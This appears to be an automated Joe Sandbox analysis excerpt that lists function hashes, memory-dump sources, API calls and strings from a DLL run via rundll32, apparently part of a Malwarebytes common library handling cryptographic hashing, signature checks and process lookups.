      • Opcode Fuzzy Hash: cc0a3cb7e0da9c7ff66ae0a5c9362b601b2ca27709e9a57ede8521292f8f2120
      • Instruction Fuzzy Hash: 3DA16B76604F88C5EBA68B05E4483E977A5F78CBD5F858016EA894B7A4DF38CA4DC700
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: Crypt$AlgorithmPropertyProvider$CloseConcurrency::cancel_current_taskDestroyHashOpen_invalid_parameter_noinfo_noreturn
      • String ID: **** Error 0x%x returned by BCryptCreateHash$**** Error 0x%x returned by BCryptFinishHash$**** Error 0x%x returned by BCryptGetProperty getting hash length$**** Error 0x%x returned by BCryptGetProperty getting object length$**** Error 0x%x returned by BCryptHashData$**** Error 0x%x returned by BCryptOpenAlgorithmProvider - Hash$**** Invalid hash buffer: %p$**** Invalid hash size: %u, need %u$**** memory allocation failed$D:\Jenkins\workspace\N_MBCommon-vs2022\src\mbcommon\CryptoUser.cpp$HashDigestLength$MD5$MbCommonSigCRYPTUSR$MbHashMemory$ObjectLength$SHA1$SHA256$SHA384$SHA512
      • API String ID: 860087726-4021669043
      • Opcode ID: 5c1f8620c86830096c7b504056d06b58c2052937ddca11c143a02181f65b63d5
      • Instruction ID: 9e2ce5262259e5bcabe6f94ea6a9927640127448378a215be27b5a32b5f0547c
      • Opcode Fuzzy Hash: 5c1f8620c86830096c7b504056d06b58c2052937ddca11c143a02181f65b63d5
      • Instruction Fuzzy Hash: 30D16F72204B48C5EBA2CB55F4847EDB7A1F78C7E5F808116EA894BBA5DF78C649C700
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: Crypt$AlgorithmDestroyProvider$CloseImportOpenPairSignatureVerify
      • String ID: **** Error 0x%x returned by BCryptOpenAlgorithmProvider$**** Failed to import public key - %x$D:\Jenkins\workspace\N_MBCommon-vs2022\src\mbcommon\CryptoUser.cpp$Failed to import the public key - %x$ImportRsaPublicKeyX$MD5$MbCommonSigCRYPTUSR$RSA$RSAPUBLICBLOB$SHA1$SHA256$SHA384$SHA512$Verify signature returns %x$VerifyData
      • API String ID: 2019841491-4080738847
      • Opcode ID: fa68690fadab714d053d2eb5b514d88ae2da970e409a4c86a8b986e7abd24159
      • Instruction ID: ed980101c0dda834f3209737b7ad7eaa71b32689e90ce2458d719ec637e924eb
      • Opcode Fuzzy Hash: fa68690fadab714d053d2eb5b514d88ae2da970e409a4c86a8b986e7abd24159
      • Instruction Fuzzy Hash: F361AC76204B4892E7A2CF11F8947DA77A5F78C7A4F948116EA8E43B65DF38C64DCB00
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: Process$ErrorLast_invalid_parameter_noinfo_noreturn$FileImageNameOpen$CloseHandle
      • String ID: D:\Jenkins\workspace\N_MBCommon-vs2022\src\mbcommon\ProcessUtils.cpp$GetProcessImageFileName for [%d] failed with error [%d]. Cannot get the process path!$OpenProcess call with pid [%d] failed with error [%d]. Cannot get the process path!$ProcessUtils$mb::common::system::ProcessUtils::GetProcessPath
      • API String ID: 1575040863-3696580403
      • Opcode ID: 29f233a9cbda2f60c6aaac86fea4f902b3204e52b0f38eaf970a43707461ded7
      • Instruction ID: e96932dfd46c146b027ab0e3fe9f41d0e7c323a40ef06e91f34071805e990d49
      • Opcode Fuzzy Hash: 29f233a9cbda2f60c6aaac86fea4f902b3204e52b0f38eaf970a43707461ded7
      • Instruction Fuzzy Hash: EFA1AD72711F48C5EB92CF65E4883DD23A1E78DBE5F408621EA9D1BB99DE78C649C300
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
      • API String ID: 808467561-2761157908
      • Opcode ID: 155f8ec017a0ba7ffc1716aa04d01c066c65c88c059d2bce09e4d6e3f582fb89
      • Instruction ID: e64712b9f006329b85b2faee8822a5d2b8dc3ae68b58e218b1303014f36bdc9b
      • Opcode Fuzzy Hash: 155f8ec017a0ba7ffc1716aa04d01c066c65c88c059d2bce09e4d6e3f582fb89
      • Instruction Fuzzy Hash: 0AB2E3727142888BF7A6CF64D8487ED77A1F3583A8F919115DA0A57E88DF39DB08CB40
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID: DEBUG$Date{0}Time{0}Tick Count{0}Process ID{0}Thread ID{0}Log Level{0}Context Tag{0}Function Name{0}File Name{0}Line Number{0}Message$ERROR$INFO$NONE$TRACE$UNKNOWN$WARNING${0}$O)
      • API String ID: 0-1175394839
      • Opcode ID: 3ec266ce1dfb9ad681a2d774538e3080bea715b79c42faf1737142f89fa23282
      • Instruction ID: e728865471310377dd45c6c8a3a48b35043e9632576cc2786ca7e8ba21f050cb
      • Opcode Fuzzy Hash: 3ec266ce1dfb9ad681a2d774538e3080bea715b79c42faf1737142f89fa23282
      • Instruction Fuzzy Hash: 55B1CF72610B8881EB52DF25E4943DD7361F78DBD8FA1D212EAAC076A5DF78C689C340
      APIs
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn$ExclusiveLock$Acquire$Concurrency::cancel_current_taskDeviceDriveLogicalQueryReleaseStrings
      • String ID:
      • API String ID: 4260757983-0
      • Opcode ID: d557855fa708ce906f49ab260f81f0c610c0e0c19cfdf631ec2296b3be148232
      • Instruction ID: db5d558c1e9556029db17fd4af993c84ea7a7e714190a018784b6b6843ff1089
      • Opcode Fuzzy Hash: d557855fa708ce906f49ab260f81f0c610c0e0c19cfdf631ec2296b3be148232
      • Instruction Fuzzy Hash: 19025172B10F8985FB42DB65E4453ED2362A78D7E8F509311EAA8166E9DF78C688C300
      APIs
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
      • String ID:
      • API String ID: 1239891234-0
      • Opcode ID: 8b76dab4a3857abd9779c3005433230d7221e9e5bf1173b1d060ab8efcc8499b
      • Instruction ID: 6fbe0a5ab35caa0a7a8088efd5404cf088294dffa798bee2e61c09e7e7bb2285
      • Opcode Fuzzy Hash: 8b76dab4a3857abd9779c3005433230d7221e9e5bf1173b1d060ab8efcc8499b
      • Instruction Fuzzy Hash: 04319236214F8486DBA1CF25E8843DE73A0F78C768F544116EA9D47BA5EF38C649CB00
      APIs
      Strings
      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00000001801078CB
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: DebugDebuggerErrorLastOutputPresentString
      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
      • API String ID: 389471666-631824599
      • Opcode ID: ac4f2ae6db917f4f87e37bddf6db85f629462927a0db851ef5fe58545d8aa7dc
      • Instruction ID: c62aa922f7e8e0fdb41f07d84f43fcc2a9736de30d8fad2d158327afe1407b89
      • Opcode Fuzzy Hash: ac4f2ae6db917f4f87e37bddf6db85f629462927a0db851ef5fe58545d8aa7dc
      • Instruction Fuzzy Hash: 13115E32310B88A7F786DB22E6583E933A1FB4C365F44C025CB5942A61EF78D6B8C710
      APIs
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
      • String ID:
      • API String ID: 2933794660-0
      • Opcode ID: 8cb0d471114c2351560cf57080cdf1a54f3117c3f47b117ae357acb3e1abe895
      • Instruction ID: eb508fc792b5aef0349723997834eec7494c9d46332be5394ead55717787b15d
      • Opcode Fuzzy Hash: 8cb0d471114c2351560cf57080cdf1a54f3117c3f47b117ae357acb3e1abe895
      • Instruction Fuzzy Hash: 22110C36711F048AEB81CF64E8593E833A5F75DB68F441E25EE6D86BA4DF78C2588340
      APIs
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: memcpy_s
      • String ID:
      • API String ID: 1502251526-0
      • Opcode ID: 58c5b441fcc557dde308f798edace5a3fe026a1be206aa60db9152cb5b0e9c63
      • Instruction ID: dea16717a6459461c981bc694ef17a16d0c3dd845920b794801fa674b0c0ca1a
      • Opcode Fuzzy Hash: 58c5b441fcc557dde308f798edace5a3fe026a1be206aa60db9152cb5b0e9c63
      • Instruction Fuzzy Hash: F9C139B271428987EB75CF19E04D79AB7A1F388B94F40C225DB8A57784DB39DA09CB40
      APIs
      • _invalid_parameter_noinfo.LIBCMT ref: 0000000180126BE8
      • SetConsoleCtrlHandler.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0000000180125818), ref: 0000000180126E04
      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0000000180125818), ref: 0000000180126E17
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: ConsoleCtrlErrorHandlerLast_invalid_parameter_noinfo
      • String ID:
      • API String ID: 2654339681-0
      • Opcode ID: b03e703916e1046b10f3869a232b6324562162d81a8b82174c66de663d7c94bc
      • Instruction ID: 0cad5d6a7708ec7627c2b370556e12f9c2e07c11c99113340310ae9708483d7b
      • Opcode Fuzzy Hash: b03e703916e1046b10f3869a232b6324562162d81a8b82174c66de663d7c94bc
      • Instruction Fuzzy Hash: F6C1BEB260164C86FAE7DB28D45C3EA27A1E79C7A2F55C425DA4A077F5DE38CB4D8300
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: InfoLocale
      • String ID: GetLocaleInfoEx
      • API String ID: 2299586839-2904428671
      • Opcode ID: c58fa79b402e6919386ef5694a0162a6e22420b1c41b766446516c9eeb2e969a
      • Instruction ID: 8364a61e272f7459822ab890d2611de5c775059b9af069b8d611d1f8da2e32a8
      • Opcode Fuzzy Hash: c58fa79b402e6919386ef5694a0162a6e22420b1c41b766446516c9eeb2e969a
      • Instruction Fuzzy Hash: D601A734700A448AE7C29B86B4483DBB7A1BB9CFE0F95C0259E4913B66CE38CA498340
      APIs
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: ExceptionRaise_clrfp
      • String ID:
      • API String ID: 15204871-0
      • Opcode ID: 351bdbe885c120d7f1782725b4111b1a2e01d45fdac977c756f5949d11557b11
      • Instruction ID: a5246351395ead6ace41139514bdf3c781a7c67c369d30a528861335f28cd911
      • Opcode Fuzzy Hash: 351bdbe885c120d7f1782725b4111b1a2e01d45fdac977c756f5949d11557b11
      • Instruction Fuzzy Hash: DDB11F77600B888FEB56CF29C88A39D7BA0F348B68F16C915DB5987BA4CB39C555C700
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID: $
      • API String ID: 0-227171996
      • Opcode ID: f37e5461d795ae9f8fc3c5a30e3aa09c1da45a80f3de5b0be8a66d2bc7a72cad
      • Instruction ID: 49e058d1f621dd75d3ae7e20055d9f1bf5ae8eb1af5a11b8716a30c85fa3d411
      • Opcode Fuzzy Hash: f37e5461d795ae9f8fc3c5a30e3aa09c1da45a80f3de5b0be8a66d2bc7a72cad
      • Instruction Fuzzy Hash: 44E1D732204E4886FBEE8E2981583AD3BA1F74DB68F98E215DA46077D4DF35CA59C700
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
